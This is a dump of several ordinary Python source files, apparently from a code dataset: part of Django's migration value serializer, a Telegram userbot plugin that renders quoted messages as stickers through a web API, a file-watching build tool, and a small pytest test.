    def serialize(self):
        # not isfinite == isnan or isinf.
        if not math.isfinite(self.value):
            return 'float("{}")'.format(self.value), set()
        return super().serialize()
class FrozensetSerializer(BaseSequenceSerializer):
    """Serialize a frozenset as frozenset([...])."""
    def _format(self):
        return "frozenset([%s])"
class FunctionTypeSerializer(BaseSerializer):
    """Serialize plain functions and class-bound methods by import path."""
    def serialize(self):
        bound_to = getattr(self.value, "__self__", None)
        if bound_to and isinstance(bound_to, type):
            # Method bound to a class (i.e. a classmethod).
            module = bound_to.__module__
            return "%s.%s.%s" % (module, bound_to.__name__, self.value.__name__), {"import %s" % module}
        # Further error checking
        if self.value.__name__ == '<lambda>':
            raise ValueError("Cannot serialize function: lambda")
        if self.value.__module__ is None:
            raise ValueError("Cannot serialize function %r: No module" % self.value)
        module_name = self.value.__module__
        # Qualname can include <locals>, which is not importable.
        if '<' not in self.value.__qualname__:
            return '%s.%s' % (module_name, self.value.__qualname__), {'import %s' % self.value.__module__}
        raise ValueError(
            'Could not find function %s in %s.\n' % (self.value.__name__, module_name)
        )
class FunctoolsPartialSerializer(BaseSerializer):
    """Serialize functools.partial / functools.partialmethod objects."""
    def serialize(self):
        # Serialize the wrapped callable and its captured arguments.
        func_string, func_imports = serializer_factory(self.value.func).serialize()
        args_string, args_imports = serializer_factory(self.value.args).serialize()
        keywords_string, keywords_imports = serializer_factory(self.value.keywords).serialize()
        imports = {'import functools'}
        imports.update(func_imports)
        imports.update(args_imports)
        imports.update(keywords_imports)
        rendered = 'functools.%s(%s, *%s, **%s)' % (
            self.value.__class__.__name__,
            func_string,
            args_string,
            keywords_string,
        )
        return rendered, imports
class IterableSerializer(BaseSerializer):
    """Serialize an arbitrary iterable as a tuple literal."""
    def serialize(self):
        imports = set()
        parts = []
        for item in self.value:
            item_string, item_imports = serializer_factory(item).serialize()
            imports.update(item_imports)
            parts.append(item_string)
        # A one-element tuple needs a trailing comma; "()" (empty) must not
        # become "(,)", which is invalid Python syntax.
        template = "(%s,)" if len(parts) == 1 else "(%s)"
        return template % ", ".join(parts), imports
class ModelFieldSerializer(DeconstructableSerializer):
    """Serialize a model field via deconstruct(); the attribute name is dropped."""
    def serialize(self):
        attr_name, path, args, kwargs = self.value.deconstruct()
        return self.serialize_deconstructed(path, args, kwargs)
class ModelManagerSerializer(DeconstructableSerializer):
    """Serialize a model manager, including QuerySet.as_manager() managers."""
    def serialize(self):
        as_manager, manager_path, qs_path, args, kwargs = self.value.deconstruct()
        if not as_manager:
            return self.serialize_deconstructed(manager_path, args, kwargs)
        # Manager built from a queryset class: render QuerySet.as_manager().
        name, imports = self._serialize_path(qs_path)
        return "%s.as_manager()" % name, imports
class OperationSerializer(BaseSerializer):
    """Serialize a migration Operation by delegating to OperationWriter."""
    def serialize(self):
        # Imported locally to avoid a circular import with the writer module.
        from django.db.migrations.writer import OperationWriter
        string, imports = OperationWriter(self.value, indentation=0).serialize()
        # Nested operation, trailing comma is handled in upper OperationWriter._write()
        return string.rstrip(','), imports
class RegexSerializer(BaseSerializer):
    """Serialize a compiled regular expression as re.compile(...)."""
    def serialize(self):
        regex_pattern, pattern_imports = serializer_factory(self.value.pattern).serialize()
        # Turn off default implicit flags (e.g. re.U) because regexes with the
        # same implicit and explicit flags aren't equal.
        flags = self.value.flags ^ re.compile('').flags
        regex_flags, flag_imports = serializer_factory(flags).serialize()
        imports = {'import re'}
        imports.update(pattern_imports)
        imports.update(flag_imports)
        pieces = [regex_pattern]
        if flags:
            pieces.append(regex_flags)
        return "re.compile(%s)" % ', '.join(pieces), imports
class SequenceSerializer(BaseSequenceSerializer):
    """Serialize a list as a [...] literal."""
    def _format(self):
        return "[%s]"
class SetSerializer(BaseSequenceSerializer):
    """Serialize a set as a literal; an empty set must be set() since {} is a dict."""
    def _format(self):
        if self.value:
            return '{%s}'
        return 'set(%s)'
class SettingsReferenceSerializer(BaseSerializer):
    """Serialize a SettingsReference as settings.<SETTING_NAME>."""
    def serialize(self):
        return "settings.%s" % self.value.setting_name, {"from django.conf import settings"}
class TupleSerializer(BaseSequenceSerializer):
    """Serialize a tuple literal; one-element tuples need a trailing comma."""
    def _format(self):
        # "()" (empty) must not become "(,)", which is invalid syntax.
        if len(self.value) == 1:
            return "(%s,)"
        return "(%s)"
class TypeSerializer(BaseSerializer):
    """Serialize a class object by its import path, with a few special cases."""
    def serialize(self):
        # Identity-matched special cases that have canonical spellings.
        special_cases = [
            (models.Model, "models.Model", []),
            (type(None), 'type(None)', []),
        ]
        for case, string, imports in special_cases:
            if case is self.value:
                return string, set(imports)
        if hasattr(self.value, "__module__"):
            module = self.value.__module__
            if module == builtins.__name__:
                # Builtins (int, str, ...) need no import.
                return self.value.__name__, set()
            return "%s.%s" % (module, self.value.__name__), {"import %s" % module}
class UUIDSerializer(BaseSerializer):
    """Serialize uuid.UUID via its repr(), e.g. uuid.UUID('...')."""
    def serialize(self):
        return "uuid.%s" % repr(self.value), {"import uuid"}
class Serializer:
    """Type -> serializer-class registry.

    NOTE: serializer_factory() walks this mapping in insertion order and
    matches with isinstance(), so more specific types must be registered
    before their bases (hence the OrderedDict).
    """
    _registry = OrderedDict([
        (frozenset, FrozensetSerializer),
        (list, SequenceSerializer),
        (set, SetSerializer),
        (tuple, TupleSerializer),
        (dict, DictionarySerializer),
        (enum.Enum, EnumSerializer),
        (datetime.datetime, DatetimeDatetimeSerializer),
        ((datetime.date, datetime.timedelta, datetime.time), DateTimeSerializer),
        (SettingsReference, SettingsReferenceSerializer),
        (float, FloatSerializer),
        ((bool, int, type(None), bytes, str), BaseSimpleSerializer),
        (decimal.Decimal, DecimalSerializer),
        ((functools.partial, functools.partialmethod), FunctoolsPartialSerializer),
        ((types.FunctionType, types.BuiltinFunctionType, types.MethodType), FunctionTypeSerializer),
        (collections.abc.Iterable, IterableSerializer),
        ((COMPILED_REGEX_TYPE, RegexObject), RegexSerializer),
        (uuid.UUID, UUIDSerializer),
    ])

    @classmethod
    def register(cls, type_, serializer):
        """Register *serializer* (a BaseSerializer subclass) for *type_*."""
        if not issubclass(serializer, BaseSerializer):
            raise ValueError("'%s' must inherit from 'BaseSerializer'." % serializer.__name__)
        cls._registry[type_] = serializer

    @classmethod
    def unregister(cls, type_):
        """Remove the serializer registered for *type_* (KeyError if absent)."""
        cls._registry.pop(type_)
def serializer_factory(value):
    """Return a serializer instance for *value*, or raise ValueError.

    The order of checks matters: lazy wrappers are unwrapped first, then
    hard-coded Django types, then anything deconstructible, and finally
    the type registry (walked in registration order with isinstance()).
    """
    if isinstance(value, Promise):
        # Lazy translation strings: force evaluation to a plain str.
        value = str(value)
    elif isinstance(value, LazyObject):
        # The unwrapped value is returned as the first item of the arguments
        # tuple.
        value = value.__reduce__()[1][0]
    if isinstance(value, models.Field):
        return ModelFieldSerializer(value)
    if isinstance(value, models.manager.BaseManager):
        return ModelManagerSerializer(value)
    if isinstance(value, Operation):
        return OperationSerializer(value)
    if isinstance(value, type):
        return TypeSerializer(value)
    # Anything that knows how to deconstruct itself.
    if hasattr(value, 'deconstruct'):
        return DeconstructableSerializer(value)
    for type_, serializer_cls in Serializer._registry.items():
        if isinstance(value, type_):
            return serializer_cls(value)
    raise ValueError(
        "Cannot serialize: %r\nThere are some values Django cannot serialize into "
        "migration files.\nFor more, see https://docs.djangoproject.com/en/%s/"
        "topics/migrations/#migration-serializing" % (value, get_docs_version())
    )
| 36.739521 | 110 | 0.653981 |
ace0a891c60900a9fd9cdfb1e79c144efeaed721 | 9,018 | py | Python | userbot/modules/quote.py | Egazaky/OpenUbot | 11c9aef811c521e6966447600556616c3c692f28 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/quote.py | Egazaky/OpenUbot | 11c9aef811c521e6966447600556616c3c692f28 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/quote.py | Egazaky/OpenUbot | 11c9aef811c521e6966447600556616c3c692f28 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | # Copyright (C) 2018-2019 Friendly Telegram
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
# Port to UserBot by @MoveAngel
import requests
import base64
import json
import telethon
from logging import Logger as logger
from PIL import Image
from io import BytesIO
from userbot import bot, CMD_HELP, QUOTES_API_TOKEN
from userbot.events import register
# Static UI strings and Quotes-API configuration. (The original wrapped
# these in a no-op `if 1 == 1:` block; the constant condition is removed,
# the assignments are unconditional either way.)
strings = {
    "name": "Quotes",
    "api_token_cfg_doc": "API Key/Token for Quotes.",
    "api_url_cfg_doc": "API URL for Quotes.",
    "colors_cfg_doc": "Username colors",
    "default_username_color_cfg_doc": "Default color for the username.",
    "no_reply": "<b>You didn't reply to a message.</b>",
    "no_template": "<b>You didn't specify the template.</b>",
    "delimiter": "</code>, <code>",
    "server_error": "<b>Server error. Please report to developer.</b>",
    "invalid_token": "<b>You've set an invalid token, get it from `http://antiddos.systems`.</b>",
    "unauthorized": "<b>You're unauthorized to do this.</b>",
    "not_enough_permissions": "<b>Wrong template. You can use only the default one.</b>",
    "templates": "<b>Available Templates:</b> <code>{}</code>",
    "cannot_send_stickers": "<b>You cannot send stickers in this chat.</b>",
    "admin": "admin",
    "creator": "creator",
    "hidden": "hidden",
    "channel": "Channel",
}
# Plain dict literal instead of the redundant dict({...}) wrapper.
config = {
    "api_url": "http://api.antiddos.systems",
    # One color per (user_id % 7) bucket; see quotecmd.
    "username_colors": ["#fb6169", "#faa357", "#b48bf2", "#85de85",
                        "#62d4e3", "#65bdf3", "#ff5694"],
    "default_username_color": "#b48bf2",
}
@register(outgoing=True, pattern="^.quote(?: |$)(.*)")
async def quotecmd(message):  # noqa: C901
    """Quote a message as a rendered sticker.
    Usage: .quote [template]
    If template is missing, "default" is used; an unknown template makes
    the server return the list of available templates."""
    if not QUOTES_API_TOKEN:
        return await message.edit(
            "`Error: Quotes API key is missing! Add it to environment variables or config.env.`"
        )
    await message.delete()
    # Everything after ".quote" is the template name.
    args = message.raw_text.split(" ")[1:]
    if args == []:
        args = ["default"]
    reply = await message.get_reply_message()
    if not reply:
        return await message.respond(strings["no_reply"])
    if not args:
        return await message.respond(strings["no_template"])
    username_color = username = admintitle = user_id = None
    profile_photo_url = reply.from_id
    admintitle = ""
    # Resolve the sender and an admin/creator title, per chat type.
    if isinstance(message.to_id, telethon.tl.types.PeerChannel):
        try:
            user = await bot(telethon.tl.functions.channels.GetParticipantRequest(message.chat_id,
                                                                                  reply.from_id))
            if isinstance(user.participant, telethon.tl.types.ChannelParticipantCreator):
                admintitle = user.participant.rank or strings["creator"]
            elif isinstance(user.participant, telethon.tl.types.ChannelParticipantAdmin):
                admintitle = user.participant.rank or strings["admin"]
            user = user.users[0]
        except telethon.errors.rpcerrorlist.UserNotParticipantError:
            user = await reply.get_sender()
    elif isinstance(message.to_id, telethon.tl.types.PeerChat):
        chat = await bot(telethon.tl.functions.messages.GetFullChatRequest(reply.to_id))
        participants = chat.full_chat.participants.participants
        participant = next(filter(lambda x: x.user_id == reply.from_id, participants), None)
        if isinstance(participant, telethon.tl.types.ChatParticipantCreator):
            admintitle = strings["creator"]
        elif isinstance(participant, telethon.tl.types.ChatParticipantAdmin):
            admintitle = strings["admin"]
        user = await reply.get_sender()
    else:
        user = await reply.get_sender()
    username = telethon.utils.get_display_name(user)
    user_id = reply.from_id
    # Forwarded messages: show the original author/channel instead.
    if reply.fwd_from:
        if reply.fwd_from.saved_from_peer:
            username = telethon.utils.get_display_name(reply.forward.chat)
            profile_photo_url = reply.forward.chat
            admintitle = strings["channel"]
        elif reply.fwd_from.from_name:
            username = reply.fwd_from.from_name
        elif reply.forward.sender:
            username = telethon.utils.get_display_name(reply.forward.sender)
        elif reply.forward.chat:
            username = telethon.utils.get_display_name(reply.forward.chat)
    # Inline the profile photo as a base64 data URI for the render API.
    pfp = await bot.download_profile_photo(profile_photo_url, bytes)
    if pfp is not None:
        profile_photo_url = "data:image/png;base64, " + base64.b64encode(pfp).decode()
    # Stable per-user color: one of 7 buckets keyed by user id.
    if user_id is not None:
        username_color = config["username_colors"][user_id % 7]
    else:
        username_color = config["default_username_color"]
    request = json.dumps({
        "ProfilePhotoURL": profile_photo_url,
        "usernameColor": username_color,
        "username": username,
        "adminTitle": admintitle,
        "Text": reply.message,
        "Markdown": await get_markdown(reply),
        "Template": args[0],
        "APIKey": QUOTES_API_TOKEN
    })
    resp = requests.post(config["api_url"] + "/api/v2/quote", data=request)
    resp.raise_for_status()
    resp = resp.json()
    # Map the API's status codes to user-facing messages.
    if resp["status"] == 500:
        return await message.respond(strings["server_error"])
    elif resp["status"] == 401:
        if resp["message"] == "ERROR_TOKEN_INVALID":
            return await message.respond(strings["invalid_token"])
        else:
            raise ValueError("Invalid response from server", resp)
    elif resp["status"] == 403:
        if resp["message"] == "ERROR_UNAUTHORIZED":
            return await message.respond(strings["unauthorized"])
        else:
            raise ValueError("Invalid response from server", resp)
    elif resp["status"] == 404:
        # Unknown template: fetch and show the list of available ones.
        if resp["message"] == "ERROR_TEMPLATE_NOT_FOUND":
            newreq = requests.post(config["api_url"] + "/api/v1/getalltemplates", data={
                "token": QUOTES_API_TOKEN
            })
            newreq = newreq.json()
            if newreq["status"] == "NOT_ENOUGH_PERMISSIONS":
                return await message.respond(strings["not_enough_permissions"])
            elif newreq["status"] == "SUCCESS":
                templates = strings["delimiter"].join(newreq["message"])
                return await message.respond(strings["templates"].format(templates))
            elif newreq["status"] == "INVALID_TOKEN":
                return await message.respond(strings["invalid_token"])
            else:
                raise ValueError("Invalid response from server", newreq)
        else:
            raise ValueError("Invalid response from server", resp)
    elif resp["status"] != 200:
        raise ValueError("Invalid response from server", resp)
    # Success: download the rendered image and send it as a webp sticker.
    req = requests.get(config["api_url"] + "/cdn/" + resp["message"])
    req.raise_for_status()
    file = BytesIO(req.content)
    file.seek(0)
    img = Image.open(file)
    with BytesIO() as sticker:
        img.save(sticker, "webp")
        sticker.name = "sticker.webp"
        sticker.seek(0)
        try:
            await reply.reply(file=sticker)
        except telethon.errors.rpcerrorlist.ChatSendStickersForbiddenError:
            await message.respond(strings["cannot_send_stickers"])
    file.close()
async def get_markdown(reply):
    """Build the quote API's Markdown entity list from a Telegram message.

    Each entity becomes {"Type", "Start", "End"} with an inclusive End
    offset; unrecognized entity types are logged and kept with Type=None.
    Returns [] when the message has no entities.
    """
    if not reply.entities:
        return []
    # BUG FIX: the module imports `Logger` (the class) aliased as `logger`,
    # so `logger.warning("...")` called the unbound method with a str as
    # `self` and crashed. Use a real module logger instead.
    import logging
    log = logging.getLogger(__name__)
    markdown = []
    for entity in reply.entities:
        md_item = {
            "Type": None,
            "Start": entity.offset,
            # End is inclusive, hence the -1.
            "End": entity.offset + entity.length - 1
        }
        if isinstance(entity, telethon.tl.types.MessageEntityBold):
            md_item["Type"] = "bold"
        elif isinstance(entity, telethon.tl.types.MessageEntityItalic):
            md_item["Type"] = "italic"
        elif isinstance(entity, (telethon.tl.types.MessageEntityMention, telethon.tl.types.MessageEntityTextUrl,
                                 telethon.tl.types.MessageEntityMentionName, telethon.tl.types.MessageEntityHashtag,
                                 telethon.tl.types.MessageEntityCashtag, telethon.tl.types.MessageEntityBotCommand,
                                 telethon.tl.types.MessageEntityUrl)):
            # All link-like entities collapse to a single "link" style.
            md_item["Type"] = "link"
        elif isinstance(entity, telethon.tl.types.MessageEntityCode):
            md_item["Type"] = "code"
        elif isinstance(entity, telethon.tl.types.MessageEntityStrike):
            md_item["Type"] = "stroke"
        elif isinstance(entity, telethon.tl.types.MessageEntityUnderline):
            md_item["Type"] = "underline"
        else:
            log.warning("Unknown entity: %s", entity)
        markdown.append(md_item)
    return markdown
# Register this module's help text in the userbot's .help index.
CMD_HELP.update({
    "stickerchat":
    ">`.quote`"
    "\nUsage: Same as quotly, enhance ur text to sticker."
})
| 41.944186 | 116 | 0.624418 |
ace0aa82da339d5ad03debab9b819adfcb5169a3 | 3,905 | py | Python | ligament/ligament.py | Archived-Object/ligament | ff3d78130522676a20dc64086dc8a27b197cc20f | [
"Apache-2.0"
] | 1 | 2015-07-22T15:27:40.000Z | 2015-07-22T15:27:40.000Z | ligament/ligament.py | Archived-Object/ligament | ff3d78130522676a20dc64086dc8a27b197cc20f | [
"Apache-2.0"
] | null | null | null | ligament/ligament.py | Archived-Object/ligament | ff3d78130522676a20dc64086dc8a27b197cc20f | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import os
import sys
import imp
import json
from buildcontext import Context, DeferredDependency
from buildtarget import BuildTarget
from compositors import BuildTargetList
from buildcontextfseventhandler import BuildContextFsEventHandler
from helpers import pout, perror
from time import sleep
from watchdog.observers import Observer
from privacy import *
def load_context_from_skeleton(skeleton_path):
    """Import a ligament skeleton file and build a Context from it.

    Registers every task from the skeleton's `ligament_tasks` dict (single
    BuildTargets directly, lists as a BuildTargetList of deferred deps),
    then exposes either the skeleton's `exposed_tasks` or, by default, all
    registered tasks. Exits the process with status 1 if the skeleton
    cannot be imported.
    """
    try:
        # '.' on sys.path so the skeleton can import project-local modules.
        sys.path.insert(0, '.')
        ligamentfile = imp.load_source('ligamentfile', skeleton_path)
    except IOError:
        perror("Error importing skeleton.py file found in current directory")
        exit (1)
    build_context = Context()
    for name, task in ligamentfile.ligament_tasks.iteritems():
        if isinstance(task, BuildTarget):
            pout("registered task '%s'" % name, groups=["debug"])
            task.register_with_context(name, build_context)
        elif isinstance(task, list):
            # A list of task names becomes one composite target.
            BuildTargetList(
                DeferredDependency(t) for t in task
            ).register_with_context(name, build_context)
    # Default to exposing everything when the skeleton doesn't say.
    to_expose = (
        ligamentfile.exposed_tasks
        if "exposed_tasks" in dir(ligamentfile)
        else build_context.tasks)
    for name in to_expose:
        if name in build_context.tasks:
            build_context.expose_task(name)
        else:
            perror("task '%s' not declared in ligament file" % name)
    return build_context
def run_skeleton(skeleton_path, tasks, watch=True):
    """loads and executes tasks from a given skeleton file
    skeleton_path:
        path to the skeleton file
    tasks:
        a list of string identifiers of tasks to be executed
    watch:
        boolean flag of if the skeleton should be watched for changes and
        automatically updated

    NOTE: this module uses Python 2 syntax (print statements, iteritems).
    Blocks until Ctrl-C when *watch* is true.
    """
    build_context = load_context_from_skeleton(skeleton_path);
    # for t in build_context.tasks:
    #     print t, str(build_context.tasks[t])
    for task in tasks:
        build_context.build_task(task)
    # print json.dumps(
    #     dict((name,
    #           str(task.value)[0:100] + "..."
    #           if 100 < len(str(task.value))
    #           else str(task.value))
    #          for name, task in build_context.tasks.iteritems()),
    #     indent=2)
    if watch:
        print
        print "resolving watch targets"
        # establish watchers
        observer = Observer()
        buildcontexteventhandler = BuildContextFsEventHandler(build_context)
        # Only tasks that actually ran (last_build_time > 0) get watched.
        built_tasks = ((taskname, task)
                       for taskname, task in build_context.tasks.iteritems()
                       if task.last_build_time > 0)
        for taskname, task in built_tasks:
            for f in task.task.file_watch_targets:
                if os.path.isdir(f):
                    print "%s: watching %s" % (taskname, f)
                    observer.schedule(
                        buildcontexteventhandler,
                        f,
                        recursive=True)
                else:
                    # watchdog watches directories, so watch the file's
                    # parent ('.' when the target has no directory part).
                    print "%s: watching %s for %s" % (taskname, os.path.dirname(f),
                                                      os.path.basename(f))
                    dirname = os.path.dirname(f)
                    observer.schedule(
                        buildcontexteventhandler,
                        dirname if dirname != "" else ".",
                        recursive=True)
        print
        print "watching for changes"
        observer.start()
        # Poll until Ctrl-C, then shut the observer down cleanly.
        try:
            while True:
                sleep(0.5)
        except KeyboardInterrupt:
            observer.stop()
        observer.join()
def query_skeleton(skeleton_path):
    """Return the names of all exposed tasks declared by *skeleton_path*."""
    build_context = load_context_from_skeleton(skeleton_path)
    exposed = []
    for name, task in build_context.tasks.iteritems():
        if task.exposed:
            exposed.append(name)
    return exposed
| 30.992063 | 83 | 0.588732 |
ace0aad91953a3ab8dc575ef3b7a2c595cf65dd5 | 606 | py | Python | zero_to_one_hundred/tests/test_refresh_map_processor.py | obar1/0to100 | 1337fb51d6704505126e159b64b7dba3e2ad16c2 | [
"Apache-2.0"
] | null | null | null | zero_to_one_hundred/tests/test_refresh_map_processor.py | obar1/0to100 | 1337fb51d6704505126e159b64b7dba3e2ad16c2 | [
"Apache-2.0"
] | 12 | 2021-09-06T10:41:37.000Z | 2021-10-03T19:26:20.000Z | zero_to_one_hundred/tests/test_refresh_map_processor.py | obar1/0to100 | 1337fb51d6704505126e159b64b7dba3e2ad16c2 | [
"Apache-2.0"
] | 1 | 2021-09-22T15:30:22.000Z | 2021-09-22T15:30:22.000Z | # pylint: disable=W0621,C0116,R0903,E0401,W0703,W1201,missing-function-docstring,E0401,C0114,W0511,W1203,C0200,C0103,W1203
from factories.ztoh_factory import ZTOHFactory
from processors.refresh_map_processor import RefreshMapProcessor
from repository.process_fs import ProcessFS as process_fs
from tests.moke.persist_fs import PersistFS as persist_fs
def test_process(get_config_map, get_args_refresh_map_processor):
    """Smoke test: the factory yields processors that run without error.

    get_config_map / get_args_refresh_map_processor are pytest fixtures
    supplied by the test suite's conftest (not visible here).
    """
    # The factory is built with the mock PersistFS and real ProcessFS.
    actual: RefreshMapProcessor = ZTOHFactory(
        persist_fs, process_fs, get_config_map
    ).get_processor(get_args_refresh_map_processor)
    # get_processor returns an iterable of processors; run each one.
    for p in actual:
        p.process()
| 43.285714 | 122 | 0.820132 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.